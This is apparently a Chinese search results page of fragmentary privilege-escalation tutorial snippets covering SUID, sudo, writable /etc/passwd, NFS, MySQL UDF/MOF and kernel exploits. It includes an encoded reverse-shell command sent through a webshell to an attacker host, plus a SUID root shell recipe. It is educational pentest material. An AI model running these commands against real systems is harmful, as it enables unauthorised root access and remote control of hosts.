首页
学习
活动
专区
工具
TVP
发布

Linux几种常用方式

---- 1、内核漏洞 提起内核漏洞就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广漏洞之一。...1.3 Linux辅助工具 github项目地址: https://github.com/mzet-/linux-exploit-suggester.git (1)根据操作系统版本号自动查找相应提脚本...(1)在Linux中查找可以用来SUID文件 find / -perm -u=s -type f 2>/dev/null ? (2)通过find以root权限执行命令 ?...可用作Linux命令及其姿势: #Find find pentestlab -exec whoami \; #Vim vim.tiny /etc/shadow #awk awk 'BEGIN{system...6、MySQL MySQL方式有UDF,MOF,写入启动项方式,但比较有意思是CVE-2016-6663、CVE-2016-6664组合利用提取场景,可以将一个www-data

4.5K20

Linux之passwd

渗透场景当我们获得了某个Linux服务器低权限之后,我们想要对该低权限账号进行,以执行更多操作,而在过程中发现当前用户具有/etc/passwd文件写权限,此时我们可以写一个用户进去完成...基础知识用户分类在Linux下,用户分为三类:超级用户(root)、普通用户、程序用户超级用户:UID=0 程序用户:Rhel5/6,UID=1-499; Rhel7,UID=1-999 普通用户:Rhel5...#查看用户密码信息cat /etc/group #查看用户组信息用户信息使用以下命令查看用户信息:cat /etc/passwd #/etc/passwd默认权限为...是为0,如果黑客把一个普通用户uid修改为0的话,那么他只要以普通用户用户名和密码登录,系统就会自动切换到root用户,常常系统加固时候都会过滤出有哪些用户UID为0。...流程确定可写首先查看/etc/passwd 权限,发现任何用户都可以对/etc/passwd文件进行读写操作:ls -lh /etc/passwd写入用户接下来要做就是自己构造一个用户,在密码占位符处指定密码

32710
您找到你想要的搜索结果了吗?
是的
没有找到

Linux姿势二:利用NFS

但是成功取决于它配置方式。 目录 1.什么是NFS? 2.什么是root_sqaush和no_root_sqaush? 3.所需工具和程序文件。 4.利用NFS弱权限。 什么是NFS?...NFS是基于UDP/IP协议应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关存取远程文件操作。RPC采用了XDR支持。...XDR是一种与机器无关数据描述编码协议,他以独立与任意机器体系结构格式对网上传送数据进行编码和解码,支持在异构系统之间数据传送。...bash"); return 0; }' > /tmp/test/suid-shell.c 编译: gcc /tmp/test/suid-shell.c -o / tmp / 1 / suid-shel 赋:...好,我们回到要服务器上 cd / tmp ./suid-shell ? 可以看到是ROOT权限了

4.7K20

Linux姿势一:滥用SUDO

在渗透中,我们拿到webshell和反弹回来shell权限可能都不高,如果我们可以使用sudo命令访问某些程序,则我们可以使用sudo可以。...sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部root命令一个工具,如halt,reboot,su等等。...在sudo于1980年前后被写出之前,一般用户管理系统方式是利用su切换为超级用户。但是使用su缺点之一在于必须要先告知超级用户密码。 sudo使一般用户不需要知道超级用户密码即可获得权限。...参数说明: -V 显示版本编号 -h 会显示版本编号及指令使用方式说明 -l 显示出自己(执行 sudo 使用者)权限 -v 因为 sudo 在第一次执行时或是在 N 分钟内没有执行(N 预设为五...仅附加此行=> touhid: 将passwd文件托管到使用任何Web服务器主机。 在要主机方面。

11.1K20

Linux脚本

前言 实际环境中会遇到过很多有shell但是权限不够情况,那么对于我这种对内核知识只存在脏牛懒狗来说,最方便快捷方式就是拿脚本来批量看当前版本内核有哪些可以利用脚本 正文 先搭建个环境...上传自动根据内核看脚本 github:https://github.com/mzet-/linux-exploit-suggester 通过一句话木马上传该.sh文件 ?...操作完毕后,在蚁剑虚拟终端中执行脚本 ? ?...可以看到当前版本内核有挺多可以利用漏洞,我这里挑一个CVE-2021-3156演示 使用命令反弹一个shell回来 echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDAuMTI5LzQ0NDQgMD4mMQ...下载地址 https://codeload.github.com/blasty/CVE-2021-3156/zip/main 下载完后,还是通过一句话木马上传上去 ubuntu系统一般都是自带python

4K20

Linux分析

前言 之前 红队视角下Linux信息收集 中提到过信息收集命令,但没有细讲。本篇文章将着重于各种linux手段,总结条件和原理。...--- 简单总结一下,红队常规手段有: [1.png] 系统信息 按照上面手段,梳理一下需收集系统信息: 内核和发行版信息 系统信息 Hostname 网卡信息 路由信息 DNS信息 用户信息...--- 软件信息 如上,梳理一下收集软件信息: 软件版本信息 sudo mysql udf mof postgres apache user config 启用模块 htpassword文件...,一般登录上去就是udf了,基本不会查看其他用户。...[8.png] systemd-detect-virt virt-what [9.png] --- 总结 本文从软件和系统两个方面梳理了linux手段,并总结了sudo、suid和sgid原理,

3K11

Linux 总结

command 进行到root 6.exim exim在特定版本下会有suid 下载exp打就完事了 rbash 绕过 何为rbash rbash,是出于安全性考虑一个功能受限bash,...,那么就可以造成 通配符 https://www.secpulse.com/archives/72965.html 总结太好了,我都不想记笔记了(偷懒 环境变量 如果我们找到一个suid权限程序...,但是我们无法完成suid,就可以试试搭配环境变量进行。...这个方法思想是,找到有suid,内部有system函数调用未指定路径命令文件。...是linux2.2后出现产物,它出现一定程度上弥补了suid这种粗糙权限管理机制,但是capabilities 自身也有造成安全隐患 简介 capabilities 把root权限细分了

5.7K20

迷糊方式以及利用ssrf到最终靶机

于是直接给bash加上suid pdb:pdb是The Python Debugger缩写,为Python标准库一个模块。...需要 在查看进程时候发现了一个有趣进程 命令:ps aux | grep root然后我们看看run.yml文件 发现tomcat只有读权限cat /opt/backups/playbook...root 第一种 sudo -l 发现luis不用密码就可以以root 执行ansible-playebook直接在网址发现一个方式 命令:TF=(mktemp)echo ‘[{hosts...通过返回包看见a标签里面有一个路径 然后ssrf读取 发现密钥 到最后通过 pdb以及tomcat.....;绕过方式 然后上传war 拿下shell 以及后面的利用ansible-playbook最后 还是知识面不够阿有什么不足 写得不对地方 求师傅们指点

1.4K20

利用mysql几种方式

利用mysql几种方式 mof 1.原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以system...2.利用条件 mysql用户具有root权限(对上面那个目录可写) 关闭了secure-file-priv 3.利用方式 下面是一段写好了mof利用代码 #pragma namespace("\\\\...但是网上很多资料都提到win2003很容易利用,而更高版本就很难成功了,所以大家遇到win2003可以试一下这种方式 udf 1.原理 UDF是利用MYSQL自定义函数功能,将MYSQL...是不是感觉挺麻烦,首先找dll文件就是一个问题,其实这个dll文件完全可以从带有udf功能大马源码中去找。当然我们也可以利用别人写好工具,网络上有很多关于udf利用脚本。...目录,读者在测试时应该根据情况进行修改 注:udf也是一般应用于win2000、win2003系统 mysql反弹shell 其实这也属于udf,只不过应用场景不同,比如现在我们没有webshell

2.1K10

Windows 系统方式汇总

收集到一些可以远程连接桌面的帐号,这是也需要,在实际渗透中有很多地方会需要这个操作,这个系列就主要介绍各种方式。...基础 在之前首先要做是对系统操作系统信息做一些信息收集,关于信息收集介绍请看之前文章《Windows环境下信息收集》,这里简单一下这几条命令: systeminfo | findstr...WINDOWS错误系统配置 有时候由于运营者错误配置可能给我们提供便利,提高我们成功率,下面就对这个方面的方法做一个简单介绍。...load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof' 查找root密码 利用mysql三种方式均需要获取...,提到了溢出、错误配置导致等,内容比较多,也有可能不全面,未来逐步更新就好。

2.6K30

TryHackMe之Linux

可以使用sudo -l命令列出用户可以使用sudo运行所有命令 ls 虽然是linux常见命令,但在寻找潜在途径,使用-la参数显示隐藏文件(以点开头)以及更详细文件权限和其他信息,以避免错过潜在文件或目录...内核漏洞 除非单个漏洞导致 root shell,否则权限升级过程将依赖于错误配置和松散权限。...,例如 sudo LD_PRELOAD=/home/user/ldpreload/shell.so find SUID 许多 Linux 权限控制依赖于控制用户和文件交互。...PATH Linux PATH 是一个环境变量,它告诉操作系统在哪里搜索可执行文件。...该文件是在 NFS 服务器安装期间创建,通常可供用户读取。此关键元素是文件中no_root_squash选项。

1.1K30

Linux 各种姿势总结

这篇讲一些关于 Linux 方法,也是参考网上一些方式,对于刚接触 Linux 伙伴来说,需要花不少时间去理解,所以这里是以个人通俗易懂思路去写,希望能帮到热爱学习朋友,先写这些方法...若有更好方式,欢迎老哥们在评论里补充一下。...方式总结 1、利用内核栈溢出 1.1 信息收集 uname -a Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug...1.2 linux-exploit-suggester-2 在我虚拟机 CentOS 执行时,发现存在脏牛漏洞 ?...不过这里是失败,没有配置错误 10、docker 组 docker组用户,目的是利用docker组用户来,因为docker组用户在容器下为root权限,通过挂载方式在容器下给本机添加sudo

18.3K73

WindowsEXP多种执行方式

0x01 前言 Windows常见方式无非就那几种:内核漏洞、数据库、第三方、服务和配置不当等,但用最多还是内核漏洞。...以前看到大多数人在利用EXP进行权时只会用exp.exe whoami,不行就放弃了,其实每个EXP执行方式是取决于开发作者是如何编写,这里分享几个我在测试中发现执行方式。...这里以CVE-2018-8120为例,这是最常见一种执行方式,可以直接将EXP上传至目标主机可读写目录中执行即可,因为国内大部分EXP都这样写,所以可通过自定义参数来执行。...使用以上提到反弹shell方式得到一个交互式SHELL,然后再执行我们上传到可读写目录中EXP即可,第一次执行whoami命令还是普通权限,再执行一次即可得到最高权限。...,这时不能直接执行我们上传EXP,会提示找不到文件,可使用以下方式EXP或路径中空格用“”双引号括起来,或者使用短文件/文件夹名。

1.8K20

红队 - 基于RBCD

”中对这种攻击背后理论基础进行了更深入讨论。...还存在充分机会来实施专注于检测基于资源约束委派或 LDAP 中继攻击高保真检测。在某些环境中,额外检测措施可能比实施进一步技术控制更可取。...在不支持这些措施情况下,防御者可能会构建一个运行第三方应用程序已知主机列表。可以调查与此已知基线任何偏差,以识别潜在 LDAP 中继攻击。...结论 本文介绍了在与适当身份验证原语结合使用时,基于资源约束委派 (RBCD) 允许本地权限提升(以及潜在远程代码执行)方法。...对于从内部渗透测试过渡到红队操作工程师来说,这个领域经常很棘手,因为通过 Cobalt Strike 而不是客户提供基于 Linux 跳转主机使用这些工具很复杂。

1.8K40
领券